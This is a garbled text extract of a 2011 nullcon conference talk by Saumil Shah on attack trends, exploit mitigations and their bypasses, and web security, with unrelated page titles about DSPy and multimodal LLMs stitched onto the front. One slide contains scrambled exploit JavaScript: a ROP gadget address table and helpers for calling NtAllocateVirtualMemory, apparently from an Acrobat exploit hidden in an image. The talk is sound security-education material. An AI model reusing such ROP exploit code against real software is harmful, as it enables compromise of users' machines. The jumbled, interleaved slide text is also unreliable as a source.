DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 

nullcon 2011 - Lessons learned from 2010

  • 1. 2010: A Net Odyssey Saumil Shah nullCON Goa net-square 26.02.2011 n|u dwitiya
  • 2. Welcome to NullCON! net-square nullcon.net | null.co.in n|u dwitiya
  • 3. # who am i Saumil Shah - CEO Net-Square saumilshah !"# !"# Hacker $%&% '(" )*+ ," net-square n|u dwitiya
  • 4. What! did we! learn from! ?! net-square n|u dwitiya
  • 5. net-square n|u dwitiya
  • 7. ATTACK SURFACE 2010-2011 5 net-square n|u dwitiya
  • 8. Wider Attack Surface 5 net-square n|u dwitiya
  • 9. Ease of Exploitation 5 net-square n|u dwitiya
  • 10. Mass Manufacturing 5 d wide Worl age, r cove our y H ides s. track net-square n|u dwitiya
  • 11. Complexity... 5 ...as neve seen r befo re! net-square n|u dwitiya
  • 12. A New Dimension! 5 NTEED!! GUARA bugs, w Fresh ne most on P resent com puters net-square n|u dwitiya
  • 13. "The amount of intelligence in the world is constant. And the population is increasing." Browser Death of HTTP Reckless Wars Standards +0.1 Plugins net-square n|u dwitiya
  • 14. Exploit Mitigation Techniques net-square n|u dwitiya
  • 15. /GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP net-square n|u dwitiya
  • 16. /GS SEH overwrites SafeSEH non-SEH DLLs DEP Return to LibC ASLR Heap Sprays Permanent DEP ROP ASLR and DEP JIT Sprays net-square n|u dwitiya
  • 17. It's SPLOIT TIME! net-square n|u dwitiya
  • 18. Jedi A/V Tricks These are not the sploitz you're looking for. net-square n|u dwitiya
  • 19. Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploit net-square n|u dwitiya
  • 20. High Tech vs. Low Tech Acrobat CoolType exploit Escape-From-PDF Return Oriented Programming code No fancy tricks net-square n|u dwitiya
  • 21. This iz what ? net-square n|u dwitiya
  • 22. I'm an evil Javascript I'm an innocent image net-square n|u dwitiya
  • 23. function packv(n) {var s=new Number (16);while(s.len (n).toString gth<8)s="0"+s;re ("%u"+s.substrin turn(unescape g(4,8)+"%u"+s.su (0,4)))}var addr bstring essof=new Array( ["ropnop"]=0x6d8 );addressof 1bdf0;addressof ["xchg_eax_esp_r et"]=0x6d81bdef; ["pop_eax_ret"]= addressof 0x6d906744;addre ["pop_ecx_ret"]= ssof 0x6d81cd57;addre ["mov_peax_ecx_r ssof et"]=0x6d979720; ["mov_eax_pecx_r addressof et"]=0x6d8d7be0; ["mov_pecx_eax_r addressof et"]=0x6d8eee01; ["inc_eax_ret"]= addressof 0x6d838f54;addre ["add_eax_4_ret" ssof ]=0x00000000;add ["call_peax_ret" ressof ]=0x6d8aec31;add ["add_esp_24_ret ressof "]=0x00000000;ad ["popad_ret"]=0x dressof 6d82a8a1;address ["call_peax"]=0x of 6d802597;functio call_ntallocatev n irtualmemory (baseptr,size,ca llnum){var ropnop (addressof["ropn =packv op"]);var pop_ea (addressof["pop_ x_ret=packv eax_ret"]);var pop_ecx_ret=pack v(addressof ["pop_ecx_ret"]) ;var mov_peax_ecx (addressof["mov_ _ret=packv peax_ecx_ret"]); mov_eax_pecx_ret var =packv(addressof ["mov_eax_pecx_r et"]);var mov_pecx_eax_ret =packv(addressof ["mov_pecx_eax_r et"]);var call_p (addressof["call eax_ret=packv _peax_ret"]);var add_esp_24_ret=p ackv(addressof ["add_esp_24_ret "]);var popad_re (addressof["popa t=packv d_ret"]);var retv al="" <CANVAS> net-square n|u dwitiya
  • 24. Server Side Vulnerabilities net-square n|u dwitiya
  • 25. SQL injection XSS CSRF RFI/LFI Input tampering net-square n|u dwitiya
  • 26. Who broke the Web? HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerful net-square n|u dwitiya
  • 27. W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010] net-square n|u dwitiya
  • 28. Application Delivery Authentication Statefulness Data Typing Non-mutable net-square n|u dwitiya
  • 29. The Web Application at present Delivery HTTP AJAX Authentication HTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets net-square n|u dwitiya
  • 30. The FUTURE is HERE! net-square n|u dwitiya
  • 31. No longer Science Fiction DEP Man in the bypassing Browser ROP code Malware Political Cyber warfare net-square n|u dwitiya
  • 33. Keep on patching! net-square n|u dwitiya
  • 34. I can haz sandbox I Also Can! net-square n|u dwitiya
  • 35. The Solution? HTML 8.0 Browser Security HTTP 2.0 Model Self Contained Apps net-square n|u dwitiya
  • 36. n|u dwitiya kthxbai saumil@net-square.com slideshare.net/saumilshah net-square www.net-square.com n|u dwitiya